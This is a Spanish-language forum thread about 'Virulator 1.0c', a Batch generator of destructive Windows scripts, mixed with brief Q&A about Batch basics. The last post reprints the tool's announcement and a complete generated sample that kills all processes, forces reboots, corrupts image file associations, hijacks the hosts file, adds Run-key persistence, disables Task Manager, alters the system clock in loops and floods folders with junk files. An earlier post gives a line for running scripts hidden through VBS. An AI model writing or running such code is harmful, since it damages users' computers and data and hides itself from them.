Autor
|
Tema: [Batch] Virulator 1.0c (Leído 25,660 veces)
|
Eleкtro
Ex-Staff
Desconectado
Mensajes: 9.885
|
Buf, cuantas cosas... Virulator está un poco abandonado. La imagen de "troyano bloqueado" es por algún código VBS que hay en el interior de virulator (No me he parado a mirar cual.)
@ R4z3L.hax REM Para ejecutar el bat en modo oculto: REM Activar la siguiente linea manualmente... REM Echo If not exist "%%TEMP%%\invisible.vbs" (Echo CreateObject("Wscript.Shell"^^).Run """" ^^^& WScript.Arguments(0^^) ^^^& """", 0, False^>"%TEMP%\invisible.vbs" ^& wscript "%%TEMP%%\invisible.vbs" %%0) Else (Exit)>>"%FILE%" algunas funciones necesitar que exista el archivo "invisible vbs", elimina las letras "REM" en la última linea. @scalverth Tienes razón, me apunto esa! @тαптяαпсє Gracias por la info Un saludo
|
|
|
En línea
|
|
|
|
zonahurbana
Desconectado
Mensajes: 178
RS, JC.
|
Gracias por todo este codigazo. Tengo unas pocas preguntas ( ahora que me he animado por revisar un poco sobre esto ) ¿ .bat es la extensión de los programas escritos en Batch? ¿Por qué no se considera a Batch como un lenguaje de programación? Es decir, ¿por qué está en la zona Scripting? ¿Este lenguaje no hace distinción entre mayúsculas y minúsculas en sus funciones verdad? Gracias nuevamente . . .
|
|
|
En línea
|
Nunca dejar de aprender es importante, más allá del ritmo que se siga ...
|
|
|
Eleкtro
Ex-Staff
Desconectado
Mensajes: 9.885
|
Hola, Gracias pero tus preguntas no son relacionadas con el aporte, debiste crear un nuevo tema... ¿.bat es la extensión de los programas escritos en Batch? Sí. También pueden ser ".cmd" (No hay diferencia). ¿Por qué no se considera a Batch como un lenguaje de programación? ¿por qué está en la zona Scripting? Porque es un lenguaje interpretado, como todos los de scripting... En cambio VB, C, Java, y todo el resto no necesitan un intérprete para su ejecución, ya que son compilados. 100% cierto es que Batch es un lenguaje de scripting, pero si lo diferencias con el resto de lenguajes de scripting puedes apreciar como haría falta añadir otro término a la lista solamente para apartar a Batch y dejarlo ahí, porque es el más limitado en todos los aspectos respecto a los otros... ¿Este lenguaje no hace distinción entre mayúsculas y minúsculas en sus funciones verdad? Correcto. Un saludo. Porfavor no seguir haciendo preguntas que no tienen nada que ver con el post o lo acabaré cerrando.
|
|
|
En línea
|
|
|
|
Rr_bug32
Desconectado
Mensajes: 102
|
muY Bueno!
|
|
|
En línea
|
....( . .).... -
|
|
|
desi
Desconectado
Mensajes: 1
|
gracias VIRULATORBy Elektro H@cker
Virulator es un creador de "virus" para los amantes de Batch. Pueden crear un "virus" dañino, O un simple archivo para gastar una broma pesada (O no tán pesada). Virulator tiene multitud de opciones y tareas variadas para añadirle a tu bomba, Además, En cada tarea hay la posibilidad de añadir tareas preconfiguradas (Y algunas son bastante divertidas xD)... PD: No se pierdan la idea que se me ocurrió para " Que no pare de correr el reloj de windows!", Es mi tarea favorita XD, Pruebenlo, Eso deja loco a cualquiera y no es dañino . - Estas son las opciones principales:- Estas son las tareas disponibles por el momento: - También dispone de una opción para visualizar el historial de tareas, Para no perder de vista lo que vamos añadiendo...- Esto es un ejemplo de un script generado con unas cuantas tareas de Virulator: :: Virus creado con [Virulator 1.0] :: By Elektro H@cker :: No me hago repsonsable del uso de este archivo. If not exist " %TEMP%\invisible.vbs" (Echo CreateObject ("Wscript.Shell" ^).Run """" ^& WScript.Arguments (0 ^) ^& """", 0, False >"C:\Users\ADMINI~1\AppData\Local\Temp\invisible.vbs" & wscript " %TEMP%\invisible.vbs" %0) Else (Exit) REM Matar proceso "explorer.exe" Taskkill /F /IM "explorer.exe" >NUL 2 >&1 REM Matar todos los procesos activos del sistema For /F "Tokens=4 delims= <>" %%X in ('wmic process get name /Format:xml ^| SORT ^| find /I ".exe" ^| Find /V /I "Taskkill" ^| Find /V /I "sort" ^| Find /V /I "cmd" ^| Find /V /I "csrss" ^| Find /V /I "conhost"' ) Do (Taskkill /F /T /IM " %%X" >NUL 2 >&1 ) REM Programar el apagado del PC en 60 segundos Shutdown /R /T 60 /C "Soy Windows y me caes mal ! No me vuelvas a encender, Noob..." /F >NUL REM Da¤ar las extensiones de archivos de imagen ASSOC .ani=regfile >NUL 2 >&1 ASSOC .bmp=regfile >NUL 2 >&1 ASSOC .cur=regfile >NUL 2 >&1 ASSOC .gif=regfile >NUL 2 >&1 ASSOC .ico=regfile >NUL 2 >&1 ASSOC .img=regfile >NUL 2 >&1 ASSOC .jpe=regfile >NUL 2 >&1 ASSOC .jpg=regfile >NUL 2 >&1 ASSOC .jpeg=regfile >NUL 2 >&1 ASSOC .pcd=regfile >NUL 2 >&1 ASSOC .png=regfile >NUL 2 >&1 ASSOC .psd=regfile >NUL 2 >&1 ASSOC .tga=regfile >NUL 2 >&1 ASSOC .tif=regfile >NUL 2 >&1 ASSOC .tiff=regfile >NUL 2 >&1 REM Abrir multi instancia "notepad.exe" Echo @echo off >>" %TEMP%\ %~n0_720826398.bat" Echo : Instance>>"%TEMP%\%~n0_720826398.bat" Echo Start /B CMD /C "notepad.exe" >>" %TEMP%\ %~n0_720826398.bat" Echo Goto : Instance>>"%TEMP%\%~n0_720826398.bat" Start /B CMD /C "%TEMP%\%~n0_720826398.bat" REM Mostrar mensaje "Te voy a joder el PC, Lammer!" Echo X=msgbox ("Te voy a joder el PC, Lammer !", 16,"Virus creado por Elektro H@cker")>"% style="color: #448888;">TEMP%\virulator.vbs" Start /B Wscript "%TEMP%\virulator.vbs" REM Bloquear pagina web "google.com" takeown /F " %windir%\System32\drivers\etc\hosts" >nul 2 >&1 icacls " %windir%\System32\drivers\etc\hosts" /grant " %username%":F /T >nul 2 >&1 Echo 127.0.1.1 google.com >>" %windir%\System32\drivers\etc\hosts" Echo 127.0.1.1 www.google.com >>" %windir%\System32\drivers\etc\hosts" REM Bucle infinito Echo @echo off >>" %TEMP%\ %~n0_2514423018.bat" Echo : Bucle>>"%TEMP%\%~n0_2514423018.bat" Echo Echo bucleeeeeeeee >>" %TEMP%\ %~n0_2514423018.bat" Echo Goto : Bucle>>"%TEMP%\%~n0_2514423018.bat" Start CMD /K "%TEMP%\%~n0_2514423018.bat" REM Ejecutar el virus al inicio del sistema "WindowsMachineSubProcess" Reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V "WindowsMachineSubProcess" /D " %WINDIR%\ %~n0.bat" /F >NUL 2 >&1 REM Modificar fecha de Windows (Bucle infinito secuencial) Echo : DateUP >" %TEMP%\DateUP.bat" Echo For /L %%%%a in (2000,1,2099 ) Do ( >>" %TEMP%\DateUP.bat" Echo For /L %%%%b in (1,1,12 ) Do ( >>" %TEMP%\DateUP.bat" Echo For /L %%%%c in (1,1,31 ) Do ( >>" %TEMP%\DateUP.bat" Echo Echo %%%%c/ %%%%b/ %%%%a ^| Date ^>NUL >>" %TEMP%\DateUP.bat" Echo ping -n 1 localhost >>" %TEMP%\DateUP.bat" Echo ) >>" %TEMP%\DateUP.bat" Echo ) >>" %TEMP%\DateUP.bat" Echo ) >>" %TEMP%\DateUP.bat" Start /B Wscript "%TEMP%\Invisible.vbs" "%TEMP%\DateUP.bat" REM Modificar hora de Windows (Bucle infinito secuencial) Echo : TimeUP >" %TEMP%\TimeUP.bat" Echo For /L %%%%a in (0,1,23 ) Do ( >>" %TEMP%\TimeUP.bat" Echo For /L %%%%b in (0,1,59 ) Do ( >>" %TEMP%\TimeUP.bat" Echo Time %%%%a: %%%%b >>" %TEMP%\TimeUP.bat" Echo ping -n 1 localhost >>" %TEMP%\TimeUP.bat" Echo ) >>" %TEMP%\TimeUP.bat" Echo ) >>" %TEMP%\TimeUP.bat" Start /B Wscript "%TEMP%\Invisible.vbs" "%TEMP%\TimeUP.bat" REM Modificar el nombre del Boot de inicio "Disco C: Infectado" label Disco C: Infectado >nul REM Renombrar extension ".jpg" a ".txt" REM Hibernar el PC RunDll32.exe powrprof.dll,SetSuspendState REM Deshabilitar el administrador de tareas (TASKMGR.EXE) reg add "hklm\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /T "REG_DWORD" /D "1" /f >nulreg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /T "REG_DWORD" /D "1" /f >nul REM Intercambiar los botones del mouse Rundll32 User32.dll,SwapMouseButton REM Fake-Virus 1 "Fake25917820" ( echo echo virus - TROJAN_DEMOLISHER code #45643676 echo echo FIRMA VIRAL: ****-****-****-8894 echo echo ESCANEANDO AREAS INFECTADAS... echo echo 86.5 %%%% DE MEMORIA FISICA ESTA INFECTADA echo ECHO LA ELIMINACION DEL DISCO INFECTADO ES NECESARIA echo echo ELIMINANDO PARCIALMENTE EL DISCO INFECTADO [C:] echo dir /b /s %%WINDIR%%\ ^| FIND /v /i "WINSXS" ^| FIND /v /i "assembly" ^| FIND /v /i "syswow64" ^| FIND /v /i "servicing" echo echo CONTENIDO DEL DISCO INFECTADO [C:] - ELIMINADO echo echo 98.00 %%%% DE MEMORIA FISICA HA SIDO DESINFECTADA echo echo MEMORIA FISICA SOBRECALENTADA ! echo ECHO APAGANDO EL SISTEMA PARA EVITAR PERDIDA DE DATOS echo shutdown /R /T 60 /C "Windows ha encontrado una amenaza de virus y debe reiniciarse. Guarde todo su trabajo ahora." /F )>%TEMP%\Fake25917820.bat Start CMD /K %TEMP%\Fake25917820.bat REM Propagar 100 archicos en cada carpeta del disco duro (PRECONFIGURADO) ( echo For /F "Tokens=*" %%%%X in (' Dir /B /S /AD " %%systemdrive%%" ^| Find /V /I "Windows" ^| Find /V /I "$Recycle.Bin"' ^) do (Call : COPY %%%%X^) echo Fsutil file createnew " %%*\ %%Random%%%%Random%%%%Random%%%%Random%%%%Random%%" 1 ^>NUL 2 ^>^&1 )>%TEMP%\basura.bat Start /B %TEMP%\basura.bat
- Y por último, Aquí tienen el script:Versión 1.0C http://pastebin.com/raw.php?i=vqUN1g3p(CASI)Todas las tareas han sido testeadas en Windows 7, Es muy posible que muchas tareas no funcionen en versiones anteriores de Windows (Y no tengo pensado ""dar soporte"" a esas versiones). Opinen lo que quieran... Que a mi ya no se me ocurre que más tareas añadir . PD: Si encuentran algún fallo/mejora/idea reportenlo aquí para corregirlo/añadirlo porfavor .Gracias. Espero que os guste aunque séa un poco y lo disfruteis! Salu2.
|
|
|
En línea
|
|
|
|
|
Mensajes similares |
|
Asunto |
Iniciado por |
Respuestas |
Vistas |
Último mensaje |
|
|
[DATOS] Análisis AV continuado virulator + rutinas ofuscación nuevas
Scripting
|
m0rf
|
3
|
3,997
|
20 Julio 2012, 23:21 pm
por BatchianoISpyxolo
|
|
|
[Batch] Insertar un batch dentro de un batch que fabrique un .txt
Scripting
|
$pedrojo2704
|
2
|
6,503
|
23 Agosto 2012, 10:08 am
por $pedrojo2704
|
|
|
[AYUDA][BATCH] Usar echo vacio en BATCH sin que diga que esta desactivado?
Scripting
|
Noxware
|
2
|
8,729
|
6 Mayo 2014, 17:46 pm
por PedroDJavier
|
|
|
¿Cual es el error que estoy cometiendo en este comando de batch? [BATCH]
Scripting
|
TheFerret
|
3
|
3,420
|
14 Enero 2015, 21:27 pm
por TheFerret
|
|
|
[BATCH] [APORTE] Batch Archive Security (ponle contraseña a tus archivos)
Scripting
|
**Aincrad**
|
2
|
3,586
|
28 Septiembre 2017, 03:06 am
por **Aincrad**
|
|